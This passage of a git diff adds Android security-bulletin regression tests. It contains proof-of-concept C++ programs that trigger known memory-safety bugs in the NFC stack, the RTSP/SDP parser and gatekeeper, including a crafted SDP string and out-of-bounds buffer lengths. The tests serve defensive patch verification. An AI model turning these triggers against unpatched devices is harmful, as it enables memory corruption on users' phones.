+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
new file mode 100644
index 0000000..a5dfb29
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
@@ -0,0 +1,111 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <rw_int.h>
+#include <nfc_int.h>
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+int main() {
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *) malloc(sizeof(uint8_t) * 32);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ NFC_HDR *p_resp = (NFC_HDR*) p_data->data.p_data;
+ p_resp->len = 0;
+ p_resp->offset = 0;
+
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN;
+ p_i93->block_size = 2 * (I93_MAX_BLOCK_LENGH + 1);
+ p_i93->ndef_tlv_start_offset = 2 * (I93_MAX_BLOCK_LENGH) - 1;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp
new file mode 100644
index 0000000..942d552
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2040",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
new file mode 100644
index 0000000..384c085
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
@@ -0,0 +1,112 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+
+constexpr int kLength = 8;
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void GKI_freebuf(void *p_buf __attribute__((unused))) {}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_BUSY;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_i93->sent_cmd = I93_CMD_EXT_GET_SYS_INFO;
+ p_data->status = NFC_STATUS_OK;
+
+ NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
+ p_resp->len = kLength;
+ p_resp->offset = 0;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp
new file mode 100644
index 0000000..f516e6a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2044",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "32",
+ include_dirs: [
+ "frameworks/av/media/libstagefright/rtsp/",
+ ],
+ shared_libs: [
+ "libmediaplayerservice",
+ "libstagefright_foundation",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
new file mode 100644
index 0000000..e733c6f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <stdlib.h>
+#include <APacketSource.h>
+#include <ASessionDescription.h>
+
+using namespace android;
+
+int main(void) {
+ sp<ASessionDescription> desc = new ASessionDescription;
+ static const char *raw =
+ "m=mFormats 20\r\n"
+ "a=rtpmap:20 MP4V-ES/1/2\r\n"
+ "a=fmtp:20 config=0000012000004000280020008061616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "616161616161616161616161616161616161616161616161616161\r\n"
+ "a=range:npt=1.1-2.2\r\n"
+ "a=framesize:1-9 \r\n"
+ "a=control:abc\r\n"
+ "a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n";
+
+ if(!desc->setTo(raw, strlen(raw))) {
+ return EXIT_FAILURE;
+ }
+
+ sp<APacketSource> source = new APacketSource(desc, 1);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
new file mode 100644
index 0000000..85304bc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2019-2099",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
new file mode 100644
index 0000000..8cfa619
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
@@ -0,0 +1,122 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <nfa_rw_int.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <stdlib.h>
+#include "../includes/common.h"
+
+#define LENGTH 0xBEB
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl);
+bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data);
+
+bool isInitialized = false;
+
+static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr;
+
+void init(void) {
+ real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy");
+ if (real_memcpy == nullptr) {
+ return;
+ }
+ isInitialized = true;
+}
+
+void *memcpy(void *to, const void *from, size_t numBytes) {
+ if (!isInitialized) {
+ init();
+ }
+ if (numBytes == LENGTH) {
+ exit(EXIT_VULNERABLE);
+ }
+ return real_memcpy(to, from, numBytes);
+}
+
+int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr,
+ tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr,
+ NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) {
+ if (ptr1) {
+ if (ptr2) {
+ free(ptr2);
+ }
+ free(ptr1);
+ }
+ if (ptr3) {
+ if (ptr4) {
+ free(ptr4);
+ }
+ free(ptr3);
+ }
+ if (ptr5) {
+ free(ptr5);
+ }
+ return status;
+}
+
+int main() {
+ GKI_init();
+ rw_init();
+ tHAL_NFC_ENTRY p_hal_entry_tbl;
+ NFA_Init(&p_hal_entry_tbl);
+
+ tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->activate_ntf.p_activate_params =
+ (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT));
+ if (!(p_data->activate_ntf.p_activate_params)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data);
+ }
+
+ tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params;
+ p_activate_params->protocol = NFC_PROTOCOL_T2T;
+
+ nfa_rw_activate_ntf(p_data);
+
+ tRW_CBACK *p_cback = rw_cb.p_cback;
+ tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA));
+ if (!p_rw_data) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params);
+ }
+
+ nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF;
+ p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR));
+ if (!(p_rw_data->data.p_data)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data);
+ }
+
+ nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t));
+ if (!(nfa_rw_cb.p_ndef_buf)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data, p_rw_data->data.p_data);
+ }
+
+ p_rw_data->data.p_data->len = LENGTH;
+ if (p_cback) {
+ p_cback(RW_T3T_CHECK_EVT, p_rw_data);
+ }
+
+ return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf);
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp
new file mode 100644
index 0000000..4052106
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2115",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ include_dirs: [
+ "system/gatekeeper/include/gatekeeper/",
+ ],
+ shared_libs: [
+ "libgatekeeper",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp
new file mode 100644
index 0000000..9ddc0e1
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp
@@ -0,0 +1,106 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define private public
+
+#include "../includes/common.h"
+#include "gatekeeper.h"
+
+using namespace gatekeeper;
+
+bool isVulnerable = false;
+const uint8_t *authTokenKey = nullptr;
+
+void *operator new(decltype(sizeof(0)) n) noexcept(false) { return malloc(n); }
+
+void operator delete(void *ptr) throw() {
+ if (ptr == authTokenKey) {
+ isVulnerable = true;
+ }
+ if (!ptr) {
+ free(ptr);
+ }
+}
+
+class DerivedGateKeeper : public GateKeeper {
+ protected:
+ bool GetAuthTokenKey(const uint8_t **auth_token_key,
+ uint32_t *length __attribute__((unused))) const {
+ *auth_token_key = (const uint8_t *)(new uint8_t());
+ authTokenKey = *auth_token_key;
+ return true;
+ }
+ void GetPasswordKey(const uint8_t **password_key __attribute__((unused)),
+ uint32_t *length __attribute__((unused))) {}
+ void ComputePasswordSignature(uint8_t *signature __attribute__((unused)),
+ uint32_t signature_length __attribute__((unused)),
+ const uint8_t *key __attribute__((unused)),
+ uint32_t key_length __attribute__((unused)),
+ const uint8_t *password __attribute__((unused)),
+ uint32_t password_length __attribute__((unused)),
+ salt_t salt __attribute__((unused))) const {}
+ void GetRandom(void *random __attribute__((unused)),
+ uint32_t requested_size __attribute__((unused))) const {}
+ void ComputeSignature(uint8_t *signature __attribute__((unused)),
+ uint32_t signature_length __attribute__((unused)),
+ const uint8_t *key __attribute__((unused)),
+ uint32_t key_length __attribute__((unused)),
+ const uint8_t *message __attribute__((unused)),
+ const uint32_t length __attribute__((unused))) const {}
+ uint64_t GetMillisecondsSinceBoot() const { return EXIT_SUCCESS; }
+ bool GetFailureRecord(uint32_t uid __attribute__((unused)),
+ secure_id_t user_id __attribute__((unused)),
+ failure_record_t *record __attribute__((unused)),
+ bool secure __attribute__((unused))) {
+ return false;
+ }
+ bool ClearFailureRecord(uint32_t uid __attribute__((unused)),
+ secure_id_t user_id __attribute__((unused)),
+ bool secure __attribute__((unused))) {
+ return false;
+ }
+ bool WriteFailureRecord(uint32_t uid __attribute__((unused)),
+ failure_record_t *record __attribute__((unused)),
+ bool secure __attribute__((unused))) {
+ return false;
+ }
+ uint32_t ComputeRetryTimeout(const failure_record_t *record __attribute__((unused))) {
+ return EXIT_SUCCESS;
+ }
+ virtual bool IsHardwareBacked() const { return false; }
+ bool DoVerify(const password_handle_t *expected_handle __attribute__((unused)),
+ const SizedBuffer &password __attribute__((unused))) {
+ return false;
+ }
+};
+
+int main() {
+ uint8_t *auth_token = new uint8_t();
+ uint32_t length = sizeof(uint32_t);
+ SizedBuffer *sb = new SizedBuffer(auth_token, length);
+ uint64_t timestamp = 1;
+ secure_id_t user_id = 1;
+ secure_id_t authenticator_id = 1;
+ uint64_t challenge = 0;
+
+ DerivedGateKeeper *object = new DerivedGateKeeper();
+ object->MintAuthToken(sb, timestamp, user_id, authenticator_id, challenge);
+
+ delete auth_token;
+ delete object;
+ delete sb;
+ return (isVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
index a7eef92..eb42b96 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
@@ -22,9 +22,6 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/",
@@ -39,7 +36,6 @@
shared_libs: [
"libnfc_nci_jni",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
index 3bbda28..c8353fe 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
@@ -22,9 +22,6 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/",
@@ -39,7 +36,6 @@
shared_libs: [
"libnfc_nci_jni",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp
new file mode 100644
index 0000000..1166510
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE_2019_2135",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/nfa/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ "packages/apps/Nfc/nci/jni/extns/pn54x/src/common/",
+ "packages/apps/Nfc/nci/jni/extns/pn54x/inc/",
+ ],
+ shared_libs: [
+ "libnfc_nci_jni",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp
new file mode 100644
index 0000000..582ddb8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp
@@ -0,0 +1,40 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfa_api.h>
+#include <nfc_api.h>
+#include <phNfcTypes.h>
+#include <phNxpExtns.h>
+
+static void nfaMockDMCallback(uint8_t, tNFA_DM_CBACK_DATA *) {}
+static void nfaMockCCallback(uint8_t, tNFA_CONN_EVT_DATA *) {}
+
+int main(void) {
+ if (EXTNS_Init(nfaMockDMCallback, nfaMockCCallback) != NFCSTATUS_SUCCESS) {
+ return EXIT_FAILURE;
+ }
+ const int32_t size = 16;
+ const int32_t offset = size - 1;
+ uint8_t *p_data = static_cast<uint8_t *>(malloc(size));
+ if (p_data == nullptr) {
+ return EXIT_FAILURE;
+ }
+ p_data[offset] = 0x60;
+ EXTNS_MfcTransceive(&p_data[offset], 1);
+ free(p_data);
+ EXTNS_Close();
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp
new file mode 100644
index 0000000..55a41e3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2206",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
